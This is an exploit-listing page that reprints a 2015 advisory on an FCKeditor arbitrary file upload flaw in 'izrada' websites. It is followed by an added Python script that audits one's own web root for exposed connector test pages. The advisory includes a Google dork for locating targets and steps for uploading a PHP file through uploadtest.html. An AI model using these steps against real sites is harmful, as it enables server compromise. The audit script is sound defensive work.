izrada (fckeditor) Arbitrary File Upload Vulnerability

CVE: N/A
Category: CWE-434
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2015-04-24
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015040165

Below is a copy:

[+] izrada (fckeditor) Arbitrary File Upload Vulnerability
[+] Exploit Title : izrada (FCKEDITOR)
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://it-b.hr
[+] Google Dork : intext:izrada web stranica: I.T.B.
[+] Date: 2015-04-23
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Versions


[+] exploit => fckeditor/editor/filemanager/connectors/uploadtest.html

[+] first go to => http://site.com/[path]

[+] then => http://www.site.com/[path]/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] select => Select the "File Uploader"> php ... upload to : Uploaded File URL:

[+] demos :

[+] Special Tnx Mahdi.Hidden - ACC3SS

[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]
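
For site owners checking their own deployments, the following added example (not part of the advisory and not FCKeditor code) walks a local web root and reports leftover connector test pages such as the `uploadtest.html` named above, plus any PHP connector whose `config.php` sets `$Config['Enabled'] = true`. The sibling `test.html` page and the `php/config.php` layout are assumptions based on the stock FCKeditor 2.x distribution; the function name `audit_webroot` is hypothetical.

```python
import os
import re
import sys

# uploadtest.html is the page named in the advisory; test.html is assumed to be
# its sibling test page in the same connectors directory (stock FCKeditor 2.x).
TEST_PAGES = {"uploadtest.html", "test.html"}
CONNECTORS_SUFFIX = os.path.join("editor", "filemanager", "connectors")
# An uncommented  $Config['Enabled'] = true ;  line (assumed 2.x config layout).
# Lines starting with // are skipped; /* ... */ block comments are not parsed.
ENABLED_RE = re.compile(
    r"^[ \t]*\$Config\[\s*['\"]Enabled['\"]\s*\]\s*=\s*true\s*;", re.I | re.M
)


def audit_webroot(webroot):
    """Return (kind, relative_path) findings for FCKeditor connector dirs."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        if not dirpath.lower().endswith(CONNECTORS_SUFFIX):
            continue
        rel = os.path.relpath(dirpath, webroot)
        # Test pages have no place on a production host: report each one.
        for name in sorted(f for f in filenames if f.lower() in TEST_PAGES):
            findings.append(("test-page", os.path.join(rel, name)))
        # The upload only succeeds if the server-side connector is switched on.
        cfg = os.path.join(dirpath, "php", "config.php")
        if os.path.isfile(cfg):
            with open(cfg, encoding="utf-8", errors="replace") as fh:
                if ENABLED_RE.search(fh.read()):
                    findings.append(
                        ("connector-enabled", os.path.join(rel, "php", "config.php"))
                    )
    return findings


if __name__ == "__main__":
    # Usage: python audit_fckeditor.py /path/to/your/own/webroot
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    results = audit_webroot(root)
    for kind, path in results:
        print(f"{kind:18} {path}")
    sys.exit(1 if results else 0)
```

A `test-page` finding is resolved by deleting the file; a `connector-enabled` finding means the file manager accepts uploads and needs authentication in front of it and a restrictive allowed-extensions list, or should be disabled if unused.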

